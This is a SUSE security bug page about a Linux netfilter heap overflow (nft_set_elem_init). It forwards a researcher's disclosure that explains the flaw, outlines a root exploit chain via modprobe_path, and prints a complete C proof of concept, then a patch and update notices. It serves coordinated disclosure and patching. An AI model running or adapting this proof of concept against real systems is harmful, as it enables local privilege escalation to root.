Bug 1201177 – VUL-0: kernel: bufferoverflow in netfilter nft_set_elem_init

Bug 1201177 - VUL-0: kernel: bufferoverflow in netfilter nft_set_elem_init


Summary:	VUL-0: kernel: bufferoverflow in netfilter nft_set_elem_init

Status:	RESOLVED DUPLICATE of bug 1201171

Classification:	Novell Products
Product:	SUSE Security Incidents
Classification:	Novell Products
Component:	Incidents
Version:	unspecified
Hardware:	Other Other

Priority:	P2 - High Severity: Major
Target Milestone:	---
Assigned To:	Kernel Bugs
QA Contact:	Security Team bot

URL:
Whiteboard:
Keywords:

Depends on:
Blocks:
	Show dependency tree / graph

Create test case

Clone This Bug

Reported:	2022-07-04 12:35 UTC by Marcus Meissner
Modified:	2022-09-01 15:01 UTC (History)
CC List:	0 users

See Also:
Found By:	---
Services Priority:
Business Priority:
Blocker:	---
Marketing QA Status:	---
IT Deployment:	---

Attachments
Add an attachment (proposed patch, testcase, etc.)

Note You need to log in before you can comment on or make changes to this bug.

Description Marcus Meissner 2022-07-04 12:35:32 UTC

via oss-sec

no cve yet, I requested one directly via Mitre webform.

https://www.openwall.com/lists/oss-security/2022/07/02/3

https://lore.kernel.org/netfilter-devel/cd9428b6-7ffb-dd22-d949-d86f4869f452@randorisec.fr/T/#u

I'm sorry I got the encoding wrong, breaking the non-breaking spaces.
Let me try again, below.  (Not trying to fix the line wrapping, which
would be too invasive an edit to make to someone else's message.)

----- Forwarded message from Hugues ANGUELKOV <hanguelkov@...dorisec.fr> -----

Date: Fri, 1 Jul 2022 17:43:16 +0200
To: linux-distros
Cc: security, pablo, kadlec, fw, netfilter-devel, coreteam, davy, amongodin
From: Hugues ANGUELKOV <hanguelkov@...dorisec.fr>
Subject: [vs] Netfilter vulnerability disclosure

Hello everyone,

One of our collaborators at RandoriSec, Arthur Mongodin found a 
vulnerability within the netfilter subsystem during his internship.
Successful exploitation of this bug leads to a Local Privilege 
Escalation (LPE) to the `root` user, as tested on Ubuntu server 22.04 
(Linux 5.15.0-39-generic).
This vulnerability is a heap buffer overflow due to a weak check and has 
been introduced within the commit 
[fdb9c405e35bdc6e305b9b4e20ebc141ed14fc81](https://github.com/torvalds/linux/commit/fdb9c405e35bdc6e305b9b4e20ebc141ed14fc81), 
it affects the Linux kernel since the version 5.8 and is still present today.

The heap buffer overflow happens in the function `nft_set_elem_init` 
(`/net/netfilter/nf_tables_api.c`)

```c
void *nft_set_elem_init(const struct nft_set *set,
            const struct nft_set_ext_tmpl *tmpl,
            const u32 *key, const u32 *key_end,
            const u32 *data, u64 timeout, u64 expiration, gfp_t gfp)
{
    struct nft_set_ext *ext;
    void *elem;

    elem = kzalloc(set->ops->elemsize + tmpl->len, 
gfp);                    <===== (0)
    if (elem == NULL)
        return NULL;

    ...

    if (nft_set_ext_exists(ext, NFT_SET_EXT_DATA))
        memcpy(nft_set_ext_data(ext), data, 
set->dlen);                     <===== (1)

    ...

    return elem;
}
```

A buffer is allocated at (0) without taking in consideration the value 
`set->dlen` used at (1) for the copy.
The computation of the needed space (`tmpl->len`) is realized before the 
call to `nft_set_elem_init`, however,
 a weak check on a user input allows a user to provide an element with 
a data length lower than the `set->dlen` for the allocation.
This check is located within the function `nft_set_elem_parse_data` 
(`/net/netfilter/nf_tables_api.c`).

```c
static int nft_setelem_parse_data(struct nft_ctx *ctx, struct nft_set *set,
                  struct nft_data_desc *desc,
                  struct nft_data *data,
                  struct nlattr *attr)
{

    ...

    if (desc->type != NFT_DATA_VERDICT && desc->len != set->dlen) 
{         <===== (2)
        nft_data_release(data, desc->type);
        return -EINVAL;
    }

    return 0;
}
```

As we can see at (2), if the data type is `NFT_DATA_VERDICT`, the 
comparison between `desc->len` and `set->dlen` is not done.
Finally, `desc->len` it is used to compute `tmpl->len` at (0) and 
`set->dlen` for the copy at (1) and they can be different.

The vulnerable code path can be reached if the kernel is built with the 
configuration `CONFIG_NETFILTER`, `CONFIG_NF_TABLES` enabled.
To exploit the vulnerability, an attacker may need to obtain an 
unprivileged user namespace to gain the capability `CAP_NET_ADMIN` 
(`CONFIG_USER_NS` and `CONFIG_NET_NS` enabled, and 
`kernel.unprivileged_userns_clone = 1`).


The exploitation was simplified by the use of an uninitialized variable 
in `nft_add_set_elem`:

```c
static int nft_add_set_elem(struct nft_ctx *ctx, struct nft_set *set, 
const struct nlattr *attr, u32 nlmsg_flags)
{
  struct nft_set_elem elem;
  ...
}
```

First we add an `elem` with the type `NFT_DATA_VALUE`, then `elem.data` 
will be filled `set->dlen` bytes, the second iteration will only erase 
the first bytes of `elem.data` with an element of type `NFT_DATA_VERDICT`.

We get an infoleak by overwriting the field `datalen` of 
an`user_key_payload` structure. The write primitive can be obtained with 
an unlinking attack on the `list_head` of the `simple_xattr` structure.
We targeted the `modprobe_path` to gain root permission by executing a 
shell wrapper.

The following Proof of Concept (PoC) will trigger KASAN on the upstream 
kernel (Linux 5.19.0-rc4)

```c
#define _GNU_SOURCE
#include <stdio.h>
#include <sched.h>
#include <stdlib.h>
#include <stdint.h>
#include <string.h>
#include <unistd.h>
#include <limits.h>
#include <arpa/inet.h>
#include <sys/xattr.h>
#include <sys/socket.h>
#include <linux/netlink.h>
#include <linux/netfilter.h>
#include <linux/netfilter/nfnetlink.h>
#include <linux/netfilter/nf_tables.h>

#define do_error_exit(msg) do {perror("[-] " msg); exit(EXIT_FAILURE); } 
while(0)

#define ID 1337
#define SET_NAME "name\0\0\0"
#define LEAK_SET_NAME "leak\0\0\0"
#define TABLE "table\0\0"

#define U32_NLA_SIZE (sizeof(struct nlattr) + sizeof(uint32_t))
#define U64_NLA_SIZE (sizeof(struct nlattr) + sizeof(uint64_t))
#define S8_NLA_SIZE (sizeof(struct nlattr) + 8)
#define NLA_BIN_SIZE(x) (sizeof(struct nlattr) + x)
#define NLA_ATTR(attr) ((void *)attr + NLA_HDRLEN)

#define TABLEMSG_SIZE NLMSG_SPACE(sizeof(struct nfgenmsg) + 
sizeof(struct nlattr) + 8)

#define KMALLOC64_KEYLEN (64 - 8 - 12 - 16) // Max size - elemsize - 
sizeof(nft_set_ext)(align) - min datasize

#define BUFFER_SIZE 64

uint8_t buffer[BUFFER_SIZE] = {0};

void new_ns(void) {

    if (unshare(CLONE_NEWUSER))
        do_error_exit("unshare(CLONE_NEWUSER)");

    if (unshare(CLONE_NEWNET))
        do_error_exit("unshare(CLONE_NEWNET)");
}

struct nlmsghdr *get_batch_begin_nlmsg(void) {

    struct nlmsghdr *nlh = (struct nlmsghdr 
*)malloc(NLMSG_SPACE(sizeof(struct nfgenmsg)));
    struct nfgenmsg *nfgm = (struct nfgenmsg *)NLMSG_DATA(nlh);

    if (!nlh)
        do_error_exit("malloc");

    memset(nlh, 0, NLMSG_SPACE(sizeof(struct nfgenmsg)));
    nlh->nlmsg_len = NLMSG_SPACE(sizeof(struct nfgenmsg));
    nlh->nlmsg_type = NFNL_MSG_BATCH_BEGIN;
    nlh->nlmsg_pid = getpid();
    nlh->nlmsg_flags = 0;
    nlh->nlmsg_seq = 0;

    /* Used to access to the netfilter tables subsystem */
    nfgm->res_id = NFNL_SUBSYS_NFTABLES;

    return nlh;
}

struct nlmsghdr *get_batch_end_nlmsg(void) {

    struct nlmsghdr *nlh = (struct nlmsghdr 
*)malloc(NLMSG_SPACE(sizeof(struct nfgenmsg)));

    if (!nlh)
        do_error_exit("malloc");

    memset(nlh, 0, NLMSG_SPACE(sizeof(struct nfgenmsg)));
    nlh->nlmsg_len = NLMSG_SPACE(sizeof(struct nfgenmsg));
    nlh->nlmsg_type = NFNL_MSG_BATCH_END;
    nlh->nlmsg_pid = getpid();
    nlh->nlmsg_flags = NLM_F_REQUEST;
    nlh->nlmsg_seq = 0;

    return nlh;
}

struct nlattr *set_nested_attr(struct nlattr *attr, uint16_t type, 
uint16_t data_len) {
    attr->nla_type = type;
    attr->nla_len = NLA_ALIGN(data_len + sizeof(struct nlattr));
    return (void *)attr + sizeof(struct nlattr);
}

struct nlattr *set_u32_attr(struct nlattr *attr, uint16_t type, uint32_t 
value) {
    attr->nla_type = type;
    attr->nla_len = U32_NLA_SIZE;
    *(uint32_t *)NLA_ATTR(attr) = htonl(value);

    return (void *)attr + U32_NLA_SIZE;
}

struct nlattr *set_str8_attr(struct nlattr *attr, uint16_t type, const 
char name[8]) {
    attr->nla_type = type;
    attr->nla_len = S8_NLA_SIZE;
    memcpy(NLA_ATTR(attr), name, 8);

    return (void *)attr + S8_NLA_SIZE;
}

struct nlattr *set_binary_attr(struct nlattr *attr, uint16_t type, 
uint8_t *buffer, uint64_t buffer_size) {
    attr->nla_type = type;
    attr->nla_len = NLA_BIN_SIZE(buffer_size);
    memcpy(NLA_ATTR(attr), buffer, buffer_size);

    return (void *)attr + NLA_ALIGN(NLA_BIN_SIZE(buffer_size));
}
void create_table(int sock, const char *name) {
    struct msghdr msg;
    struct sockaddr_nl dest_snl;
    struct iovec iov[3];
    struct nlmsghdr *nlh_batch_begin;
    struct nlmsghdr *nlh;
    struct nlmsghdr *nlh_batch_end;
    struct nlattr *attr;
    struct nfgenmsg *nfm;

    /* Destination preparation */
    memset(&dest_snl, 0, sizeof(dest_snl));
    dest_snl.nl_family = AF_NETLINK;
    memset(&msg, 0, sizeof(msg));

    /* Netlink batch_begin message preparation */
    nlh_batch_begin = get_batch_begin_nlmsg();

    /* Netlink table message preparation */
    nlh = (struct nlmsghdr *)malloc(TABLEMSG_SIZE);
    if (!nlh)
        do_error_exit("malloc");

    memset(nlh, 0, TABLEMSG_SIZE);
    nlh->nlmsg_len = TABLEMSG_SIZE;
    nlh->nlmsg_type = (NFNL_SUBSYS_NFTABLES << 8) | NFT_MSG_NEWTABLE;
    nlh->nlmsg_pid = getpid();
    nlh->nlmsg_flags = NLM_F_REQUEST;
    nlh->nlmsg_seq = 0;

    nfm = NLMSG_DATA(nlh);
    nfm->nfgen_family = NFPROTO_INET;

    /** Prepare associated attribute **/
    attr = (void *)nlh + NLMSG_SPACE(sizeof(struct nfgenmsg));
    set_str8_attr(attr, NFTA_TABLE_NAME, name);

    /* Netlink batch_end message preparation */
    nlh_batch_end = get_batch_end_nlmsg();

    /* IOV preparation */
    memset(iov, 0, sizeof(struct iovec) * 3);
    iov[0].iov_base = (void *)nlh_batch_begin;
    iov[0].iov_len = nlh_batch_begin->nlmsg_len;
    iov[1].iov_base = (void *)nlh;
    iov[1].iov_len = nlh->nlmsg_len;
    iov[2].iov_base = (void *)nlh_batch_end;
    iov[2].iov_len = nlh_batch_end->nlmsg_len;

    /* Message header preparation */
    msg.msg_name = (void *)&dest_snl;
    msg.msg_namelen = sizeof(struct sockaddr_nl);
    msg.msg_iov = iov;
    msg.msg_iovlen = 3;

    sendmsg(sock, &msg, 0);

    /* Free used structures */
    free(nlh_batch_end);
    free(nlh);
    free(nlh_batch_begin);
}

void create_set(int sock, const char *set_name, uint32_t set_keylen, 
uint32_t data_len, const char *table_name, uint32_t id) {
    struct msghdr msg;
    struct sockaddr_nl dest_snl;
    struct nlmsghdr *nlh_batch_begin;
    struct nlmsghdr *nlh_payload;
    struct nlmsghdr *nlh_batch_end;
    struct nfgenmsg *nfm;
    struct nlattr *attr;
    uint64_t nlh_payload_size;
    struct iovec iov[3];

    /* Prepare the netlink sockaddr for msg */
    memset(&dest_snl, 0, sizeof(struct sockaddr_nl));
    dest_snl.nl_family = AF_NETLINK;

    /* First netlink message: batch_begin */
    nlh_batch_begin = get_batch_begin_nlmsg();

    /* Second netlink message : Set attributes */
    nlh_payload_size = sizeof(struct 
nfgenmsg);                                     // Mandatory
    nlh_payload_size += 
S8_NLA_SIZE;                                                // 
NFTA_SET_TABLE
    nlh_payload_size += 
S8_NLA_SIZE;                                                // NFTA_SET_NAME
    nlh_payload_size += 
U32_NLA_SIZE;                                               // NFTA_SET_ID
    nlh_payload_size += 
U32_NLA_SIZE;                                               // 
NFTA_SET_KEY_LEN
    nlh_payload_size += 
U32_NLA_SIZE;                                               // 
NFTA_SET_FLAGS
    nlh_payload_size += 
U32_NLA_SIZE;                                               // 
NFTA_SET_DATA_TYPE
    nlh_payload_size += 
U32_NLA_SIZE;                                               // 
NFTA_SET_DATA_LEN
    nlh_payload_size = NLMSG_SPACE(nlh_payload_size);

    /** Allocation **/
    nlh_payload = (struct nlmsghdr *)malloc(nlh_payload_size);
    if (!nlh_payload)
        do_error_exit("malloc");

    memset(nlh_payload, 0, nlh_payload_size);

    /** Fill the required fields **/
    nlh_payload->nlmsg_len = nlh_payload_size;
    nlh_payload->nlmsg_type = (NFNL_SUBSYS_NFTABLES << 8) | NFT_MSG_NEWSET;
    nlh_payload->nlmsg_pid = getpid();
    nlh_payload->nlmsg_flags = NLM_F_REQUEST | NLM_F_CREATE;
    nlh_payload->nlmsg_seq = 0;


    /** Setup the nfgenmsg **/
    nfm = (struct nfgenmsg *)NLMSG_DATA(nlh_payload);
    nfm->nfgen_family = 
NFPROTO_INET;                                               // Verify if 
it is compulsory

    /** Setup the attributes */
    attr = (struct nlattr *)((void *)nlh_payload + 
NLMSG_SPACE(sizeof(struct nfgenmsg)));
    attr = set_str8_attr(attr, NFTA_SET_TABLE, table_name);
    attr = set_str8_attr(attr, NFTA_SET_NAME, set_name);
    attr = set_u32_attr(attr, NFTA_SET_ID, id);
    attr = set_u32_attr(attr, NFTA_SET_KEY_LEN, set_keylen);
    attr = set_u32_attr(attr, NFTA_SET_FLAGS, NFT_SET_MAP);
    attr = set_u32_attr(attr, NFTA_SET_DATA_TYPE, 0);
    set_u32_attr(attr, NFTA_SET_DATA_LEN, data_len);

    /* Last netlink message: batch_end */
    nlh_batch_end = get_batch_end_nlmsg();

    /* Setup the iovec */
    memset(iov, 0, sizeof(struct iovec) * 3);
    iov[0].iov_base = (void *)nlh_batch_begin;
    iov[0].iov_len = nlh_batch_begin->nlmsg_len;
    iov[1].iov_base = (void *)nlh_payload;
    iov[1].iov_len = nlh_payload->nlmsg_len;
    iov[2].iov_base = (void *)nlh_batch_end;
    iov[2].iov_len = nlh_batch_end->nlmsg_len;

    /* Prepare the message to send */
    memset(&msg, 0, sizeof(struct msghdr));
    msg.msg_name = (void *)&dest_snl;
    msg.msg_namelen = sizeof(struct sockaddr_nl);
    msg.msg_iov = iov;
    msg.msg_iovlen = 3;

    /* Send message */
    sendmsg(sock, &msg, 0);

    /* Free allocated memory */
    free(nlh_batch_end);
    free(nlh_payload);
    free(nlh_batch_begin);
}

void add_elem_to_set(int sock, const char *set_name, uint32_t 
set_keylen, const char *table_name, uint32_t id, uint32_t data_len, 
uint8_t *data) {
    struct msghdr msg;
    struct sockaddr_nl dest_snl;
    struct nlmsghdr *nlh_batch_begin;
    struct nlmsghdr *nlh_payload;
    struct nlmsghdr *nlh_batch_end;
    struct nfgenmsg *nfm;
    struct nlattr *attr;
    uint64_t nlh_payload_size;
    uint64_t nested_attr_size;
    struct iovec iov[3];

    /* Prepare the netlink sockaddr for msg */
    memset(&dest_snl, 0, sizeof(struct sockaddr_nl));
    dest_snl.nl_family = AF_NETLINK;

    /* First netlink message: batch */
    nlh_batch_begin = get_batch_begin_nlmsg();

    /* Second netlink message : Set attributes */

    /** Precompute the size of the nested field **/
    nested_attr_size = 0;

    nested_attr_size += sizeof(struct 
nlattr);                                      // Englobing attribute
    nested_attr_size += sizeof(struct 
nlattr);                                      // NFTA_SET_ELEM_KEY
    nested_attr_size += 
NLA_BIN_SIZE(set_keylen);                                      // 
NFTA_DATA_VALUE
    nested_attr_size += sizeof(struct 
nlattr);                                      // NFTA_SET_ELEM_DATA
    nested_attr_size += sizeof(struct 
nlattr);                                      // NFTA_DATA_VERDICT
    nested_attr_size += 
U32_NLA_SIZE;                                               // 
NFTA_VERDICT_CODE

    nlh_payload_size = sizeof(struct 
nfgenmsg);                                     // Mandatory
    nlh_payload_size += sizeof(struct 
nlattr);                                      // NFTA_SET_ELEM_LIST_ELEMENTS
    nlh_payload_size += 
nested_attr_size;                                           // All the 
stuff described above
    nlh_payload_size += 
S8_NLA_SIZE;                                                // 
NFTA_SET_ELEM_LIST_TABLE
    nlh_payload_size += 
S8_NLA_SIZE;                                                // 
NFTA_SET_ELEM_LIST_SET
    nlh_payload_size += 
U32_NLA_SIZE;                                               // 
NFTA_SET_ELEM_LIST_SET_ID
    nlh_payload_size = NLMSG_SPACE(nlh_payload_size);

    /** Allocation **/
    nlh_payload = (struct nlmsghdr *)malloc(nlh_payload_size);
    if (!nlh_payload) {
        do_error_exit("malloc");
    }
    memset(nlh_payload, 0, nlh_payload_size);

    /** Fill the required fields **/
    nlh_payload->nlmsg_len = nlh_payload_size;
    nlh_payload->nlmsg_type = (NFNL_SUBSYS_NFTABLES << 8) | 
NFT_MSG_NEWSETELEM;
    nlh_payload->nlmsg_pid = getpid();
    nlh_payload->nlmsg_flags = NLM_F_REQUEST;
    nlh_payload->nlmsg_seq = 0;

    /** Setup the nfgenmsg **/
    nfm = (struct nfgenmsg *)NLMSG_DATA(nlh_payload);
    nfm->nfgen_family = NFPROTO_INET;

    /** Setup the attributes */
    attr = (struct nlattr *)((void *)nlh_payload + 
NLMSG_SPACE(sizeof(struct nfgenmsg)));
    attr = set_str8_attr(attr, NFTA_SET_ELEM_LIST_TABLE, table_name);
    attr = set_str8_attr(attr, NFTA_SET_ELEM_LIST_SET, set_name);
    attr = set_u32_attr(attr, NFTA_SET_ELEM_LIST_SET_ID, id);
    attr = set_nested_attr(attr, NFTA_SET_ELEM_LIST_ELEMENTS, 
nested_attr_size);

    attr = set_nested_attr(attr, 0, nested_attr_size - 4);
    attr = set_nested_attr(attr, NFTA_SET_ELEM_KEY, 
NLA_BIN_SIZE(set_keylen));
    attr = set_binary_attr(attr, NFTA_DATA_VALUE, (uint8_t *)buffer, 
set_keylen);
    attr = set_nested_attr(attr, NFTA_SET_ELEM_DATA, U32_NLA_SIZE + 
sizeof(struct nlattr));
    attr = set_nested_attr(attr, NFTA_DATA_VERDICT, U32_NLA_SIZE);
    set_u32_attr(attr, NFTA_VERDICT_CODE, NFT_CONTINUE);

    /* Last netlink message: End of batch */
    nlh_batch_end = get_batch_end_nlmsg();

    /* Setup the iovec */
    memset(iov, 0, sizeof(struct iovec) * 3);
    iov[0].iov_base = (void *)nlh_batch_begin;
    iov[0].iov_len = nlh_batch_begin->nlmsg_len;
    iov[1].iov_base = (void *)nlh_payload;
    iov[1].iov_len = nlh_payload->nlmsg_len;
    iov[2].iov_base = (void *)nlh_batch_end;
    iov[2].iov_len = nlh_batch_end->nlmsg_len;

    /* Prepare the message to send */
    memset(&msg, 0, sizeof(struct msghdr));
    msg.msg_name = (void *)&dest_snl;
    msg.msg_namelen = sizeof(struct sockaddr_nl);
    msg.msg_iov = iov;
    msg.msg_iovlen = 3;

    /* Send message */
    sendmsg(sock, &msg, 0);

    /* Free allocated memory */
    free(nlh_batch_end);
    free(nlh_payload);
    free(nlh_batch_begin);
}

int main(int argc, char **argv) {

    int sock;
    struct sockaddr_nl snl;
    struct leak *bases;

    new_ns();
    printf("[+] Get CAP_NET_ADMIN capability\n");

    /* Netfilter netlink socket creation */
    if ((sock = socket(AF_NETLINK, SOCK_DGRAM, NETLINK_NETFILTER)) < 0) {
        do_error_exit("socket");
    }
    printf("[+] Netlink socket created\n");

    // Binding
    memset(&snl, 0, sizeof(snl));
    snl.nl_family = AF_NETLINK;
    snl.nl_pid = getpid();
    if (bind(sock, (struct sockaddr *)&snl, sizeof(snl)) < 0) {
        do_error_exit("bind");
    }
    printf("[+] Netlink socket bound\n");

    /* Create a netfilter table */
    create_table(sock, TABLE);
    printf("[+] Table created\n");

    /*  Create a netfilter set */
    create_set(sock, SET_NAME, KMALLOC64_KEYLEN, BUFFER_SIZE, TABLE, ID);
    printf("[+] Set created\n");

    /* Prepare the payload for the write primitive */
    add_elem_to_set(sock, SET_NAME, KMALLOC64_KEYLEN, TABLE, ID, 
BUFFER_SIZE, buffer);
    printf("[+] Overflow done\n");

    return EXIT_SUCCESS;
}
```

We propose the following patch. We think that the comparison must be 
mandatory and may be enough for patch this vulnerability.
However, we are not experts at Linux kernel programming and we are still 
unsure if it will not break something along the way.
This patch was applied on the current upstream version.

```diff
static int nft_setelem_parse_data(struct nft_ctx *ctx, struct nft_set *set,
                  struct nft_data_desc *desc,
                  struct nft_data *data,
                  struct nlattr *attr)
{

    ...

-    if (desc->type != NFT_DATA_VERDICT && desc->len != set->dlen) {
+    if (desc->len != set->dlen) {

                nft_data_release(data, desc->type);
        return -EINVAL;
    }

    return 0;
}
```

We would like to reserve a CVE for this vulnerability.

Also, we would like to release the LPE exploit targeting Ubuntu server 
along with a more detailed blogpost.
If needed, we can supply the exploit. Depending of your workload, we can 
suggest the August, 15th 2022 as a potential date for public disclosure.

Thank you for your attention and we also would like to thank you for all 
the work put on the Linux kernel.

Comment 1 Marcus Meissner 2022-07-04 12:36:24 UTC

https://git.kernel.org/pub/scm/linux/kernel/git/netdev/net.git/commit/?id=7e6bc1f6cabcd30aba0b11219d8e01b952eacbb6

hopefully just 5.8+ so SLES 15 SP4 and later.

Comment 2 Marcus Meissner 2022-07-04 13:04:16 UTC

dup of bug 1201171

*** This bug has been marked as a duplicate of bug 1201171 ***

Comment 3 Swamp Workflow Management 2022-07-12 22:19:42 UTC

SUSE-SU-2022:2376-1: An update that solves 9 vulnerabilities and has 40 fixes is now available.

Category: security (important)
Bug References: 1065729,1179195,1180814,1185762,1192761,1193629,1194013,1195504,1195775,1196901,1197362,1197754,1198020,1199487,1199489,1199657,1200217,1200263,1200442,1200571,1200599,1200600,1200608,1200619,1200622,1200692,1200806,1200807,1200809,1200810,1200813,1200816,1200820,1200821,1200822,1200825,1200828,1200829,1200925,1201050,1201080,1201143,1201147,1201149,1201160,1201171,1201177,1201193,1201222
CVE References: CVE-2021-26341,CVE-2021-4157,CVE-2022-1679,CVE-2022-20132,CVE-2022-20154,CVE-2022-29900,CVE-2022-29901,CVE-2022-33981,CVE-2022-34918
JIRA References: 
Sources used:
openSUSE Leap 15.3 (src):    kernel-azure-5.3.18-150300.38.69.1, kernel-source-azure-5.3.18-150300.38.69.1, kernel-syms-azure-5.3.18-150300.38.69.1
SUSE Linux Enterprise Module for Public Cloud 15-SP3 (src):    kernel-azure-5.3.18-150300.38.69.1, kernel-source-azure-5.3.18-150300.38.69.1, kernel-syms-azure-5.3.18-150300.38.69.1

NOTE: This line indicates an update has been released for the listed product(s). At times this might be only a partial fix. If you have questions please reach out to maintenance coordination.

Comment 4 Swamp Workflow Management 2022-07-18 10:22:53 UTC

SUSE-SU-2022:2424-1: An update that solves 10 vulnerabilities, contains one feature and has 43 fixes is now available.

Category: security (important)
Bug References: 1065729,1179195,1180814,1184924,1185762,1192761,1193629,1194013,1195504,1195775,1196901,1197362,1197754,1198020,1198924,1199482,1199487,1199489,1199657,1200217,1200263,1200343,1200442,1200571,1200599,1200600,1200608,1200619,1200622,1200692,1200806,1200807,1200809,1200810,1200813,1200816,1200820,1200821,1200822,1200825,1200828,1200829,1200925,1201050,1201080,1201143,1201147,1201149,1201160,1201171,1201177,1201193,1201222
CVE References: CVE-2021-26341,CVE-2021-4157,CVE-2022-1012,CVE-2022-1679,CVE-2022-20132,CVE-2022-20154,CVE-2022-29900,CVE-2022-29901,CVE-2022-33981,CVE-2022-34918
JIRA References: SLE-15442
Sources used:
SUSE Linux Enterprise Module for Realtime 15-SP3 (src):    kernel-rt-5.3.18-150300.96.1, kernel-rt_debug-5.3.18-150300.96.1, kernel-source-rt-5.3.18-150300.96.1, kernel-syms-rt-5.3.18-150300.96.1
SUSE Linux Enterprise Micro 5.2 (src):    kernel-rt-5.3.18-150300.96.1
SUSE Linux Enterprise Micro 5.1 (src):    kernel-rt-5.3.18-150300.96.1

NOTE: This line indicates an update has been released for the listed product(s). At times this might be only a partial fix. If you have questions please reach out to maintenance coordination.

Comment 5 Swamp Workflow Management 2022-07-18 10:29:27 UTC

SUSE-SU-2022:2422-1: An update that solves 11 vulnerabilities and has 44 fixes is now available.

Category: security (important)
Bug References: 1065729,1179195,1180814,1184924,1185762,1192761,1193629,1194013,1195504,1195775,1196901,1197362,1197754,1198020,1198924,1199482,1199487,1199489,1199657,1200217,1200263,1200343,1200442,1200571,1200599,1200600,1200604,1200605,1200608,1200619,1200622,1200692,1200806,1200807,1200809,1200810,1200813,1200816,1200820,1200821,1200822,1200825,1200828,1200829,1200925,1201050,1201080,1201143,1201147,1201149,1201160,1201171,1201177,1201193,1201222
CVE References: CVE-2021-26341,CVE-2021-4157,CVE-2022-1012,CVE-2022-1679,CVE-2022-20132,CVE-2022-20141,CVE-2022-20154,CVE-2022-29900,CVE-2022-29901,CVE-2022-33981,CVE-2022-34918
JIRA References: 
Sources used:
openSUSE Leap 15.4 (src):    dtb-aarch64-5.3.18-150300.59.81.1
openSUSE Leap 15.3 (src):    dtb-aarch64-5.3.18-150300.59.81.1, kernel-64kb-5.3.18-150300.59.81.1, kernel-debug-5.3.18-150300.59.81.1, kernel-default-5.3.18-150300.59.81.1, kernel-default-base-5.3.18-150300.59.81.1.150300.18.47.2, kernel-docs-5.3.18-150300.59.81.1, kernel-kvmsmall-5.3.18-150300.59.81.1, kernel-obs-build-5.3.18-150300.59.81.1, kernel-obs-qa-5.3.18-150300.59.81.1, kernel-preempt-5.3.18-150300.59.81.1, kernel-source-5.3.18-150300.59.81.1, kernel-syms-5.3.18-150300.59.81.1, kernel-zfcpdump-5.3.18-150300.59.81.1
SUSE Linux Enterprise Workstation Extension 15-SP3 (src):    kernel-default-5.3.18-150300.59.81.1, kernel-preempt-5.3.18-150300.59.81.1
SUSE Linux Enterprise Module for Live Patching 15-SP3 (src):    kernel-default-5.3.18-150300.59.81.1, kernel-livepatch-SLE15-SP3_Update_21-1-150300.7.5.1
SUSE Linux Enterprise Module for Legacy Software 15-SP3 (src):    kernel-default-5.3.18-150300.59.81.1
SUSE Linux Enterprise Module for Development Tools 15-SP3 (src):    kernel-docs-5.3.18-150300.59.81.1, kernel-obs-build-5.3.18-150300.59.81.1, kernel-preempt-5.3.18-150300.59.81.1, kernel-source-5.3.18-150300.59.81.1, kernel-syms-5.3.18-150300.59.81.1
SUSE Linux Enterprise Module for Basesystem 15-SP3 (src):    kernel-64kb-5.3.18-150300.59.81.1, kernel-default-5.3.18-150300.59.81.1, kernel-default-base-5.3.18-150300.59.81.1.150300.18.47.2, kernel-preempt-5.3.18-150300.59.81.1, kernel-source-5.3.18-150300.59.81.1, kernel-zfcpdump-5.3.18-150300.59.81.1
SUSE Linux Enterprise Micro 5.2 (src):    kernel-default-5.3.18-150300.59.81.1, kernel-default-base-5.3.18-150300.59.81.1.150300.18.47.2
SUSE Linux Enterprise Micro 5.1 (src):    kernel-default-5.3.18-150300.59.81.1, kernel-default-base-5.3.18-150300.59.81.1.150300.18.47.2
SUSE Linux Enterprise High Availability 15-SP3 (src):    kernel-default-5.3.18-150300.59.81.1

NOTE: This line indicates an update has been released for the listed product(s). At times this might be only a partial fix. If you have questions please reach out to maintenance coordination.

Comment 6 Swamp Workflow Management 2022-07-21 22:40:57 UTC

SUSE-SU-2022:2520-1: An update that solves 49 vulnerabilities, contains 26 features and has 207 fixes is now available.

Category: security (important)
Bug References: 1055117,1061840,1065729,1071995,1089644,1103269,1118212,1121726,1137728,1156395,1157038,1157923,1175667,1179439,1179639,1180814,1183682,1183872,1184318,1184924,1187716,1188885,1189998,1190137,1190208,1190336,1190497,1190768,1190786,1190812,1191271,1191663,1192483,1193064,1193277,1193289,1193431,1193556,1193629,1193640,1193787,1193823,1193852,1194086,1194111,1194191,1194409,1194501,1194523,1194526,1194583,1194585,1194586,1194625,1194765,1194826,1194869,1195099,1195287,1195478,1195482,1195504,1195651,1195668,1195669,1195775,1195823,1195826,1195913,1195915,1195926,1195944,1195957,1195987,1196079,1196114,1196130,1196213,1196306,1196367,1196400,1196426,1196478,1196514,1196570,1196723,1196779,1196830,1196836,1196866,1196868,1196869,1196901,1196930,1196942,1196960,1197016,1197157,1197227,1197243,1197292,1197302,1197303,1197304,1197362,1197386,1197501,1197601,1197661,1197675,1197761,1197817,1197819,1197820,1197888,1197889,1197894,1197915,1197917,1197918,1197920,1197921,1197922,1197926,1198009,1198010,1198012,1198013,1198014,1198015,1198016,1198017,1198018,1198019,1198020,1198021,1198022,1198023,1198024,1198027,1198030,1198034,1198058,1198217,1198379,1198400,1198402,1198410,1198412,1198413,1198438,1198484,1198577,1198585,1198660,1198802,1198803,1198806,1198811,1198826,1198829,1198835,1198968,1198971,1199011,1199024,1199035,1199046,1199052,1199063,1199163,1199173,1199260,1199314,1199390,1199426,1199433,1199439,1199482,1199487,1199505,1199507,1199605,1199611,1199626,1199631,1199650,1199657,1199674,1199736,1199793,1199839,1199875,1199909,1200015,1200019,1200045,1200046,1200144,1200205,1200211,1200259,1200263,1200284,1200315,1200343,1200420,1200442,1200475,1200502,1200567,1200569,1200571,1200599,1200600,1200608,1200611,1200619,1200692,1200762,1200763,1200806,1200807,1200808,1200809,1200810,1200812,1200813,1200815,1200816,1200820,1200821,1200822,1200824,1200825,1200827,1200828,1200829,1200830,1200845,1200882,1200925,1201050,1201080,1201160,1201171,1201177,1201193,1201196,1201218,1201222,1201228,1201251,1201381,1201471,1201524
